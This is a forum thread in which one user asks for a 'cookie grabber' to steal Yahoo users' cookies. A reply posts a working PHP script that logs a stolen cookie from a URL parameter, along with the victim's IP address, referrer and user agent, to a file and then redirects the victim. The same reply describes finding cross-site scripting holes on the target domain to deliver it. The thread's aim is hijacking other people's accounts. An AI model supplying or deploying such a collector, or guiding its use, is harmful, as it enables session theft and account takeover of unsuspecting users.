hobbit monitor
+ Reply to Thread
Results 1 to 2 of 2

Thread: cookie grabber?

  1. #1
    Join Date
    Sep 2006
    Posts
    1

    Arrow cookie grabber?

    anyone has a cookie grabber... or can someone pm me how to get cookie in yahoo.. hope its ok ask and share somthing... thanx in advanced...

  2. #2
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by -ICEBOX-
    anyone has a cookie grabber... o
    'Cookie grabbers' are simply php/perl scripts which take in data and write it to file or email it. They become 'cookie grabbers' when you set this data as the user's cookie. There is nothing special about them.

    To get a cookie grabber, go learn php. Even if you were given one you would not know how to use it unless you had knowledge of the languages (php/perl, html, and javascript). It's not some magic script which does everything for you.

    [PHP]<?php
    $text = "\r\n\r\n-> Date: " . date('r') . "\r\n-> User's IP Address: " . $_SERVER["REMOTE_ADDR"] . "\r\n-> Referrer: " . $_SERVER['HTTP_REFERER'] . "\r\n-> User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n-> Cookie:\r\n\r\n" . $_GET["ck"] . " \r\n\r\n============================================================================================ ===========================";
    $filehandle = fopen("cookies.txt", "a");
    fwrite($filehandle, $text);
    fclose($filehandle);
    header("Location: http://www.google.com");
    ?>[/PHP]

    See how pointless me posting that script was?

    r can someone pm me how to get cookie in yahoo.. hope its ok ask and share somthing... thanx in advanced...
    To get cookies from yahoo users you examine all the web pages on the ********** domain until you find a cross site scripting vulnerability. You need to know the languages mentioned above, and nobody will do this for you.

+ Reply to Thread

Similar Threads

  1. Cookie a Blessing ?
    By Dr-Hack in forum General discussion
    Replies: 2
    Last Post: 10-25-2012, 01:27 AM
  2. Password From a cookie?
    By longball in forum Internet Privacy
    Replies: 20
    Last Post: 07-17-2007, 05:54 AM
  3. Cookie stealing
    By whizzlechiz in forum Internet Privacy
    Replies: 12
    Last Post: 02-11-2007, 10:26 PM
  4. how can i get some* else cookie?
    By dendang in forum Internet Privacy
    Replies: 1
    Last Post: 01-30-2007, 06:12 PM
  5. Help me with cookie decryption
    By evilopinions in forum Security & Encryption
    Replies: 7
    Last Post: 12-12-2005, 04:36 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts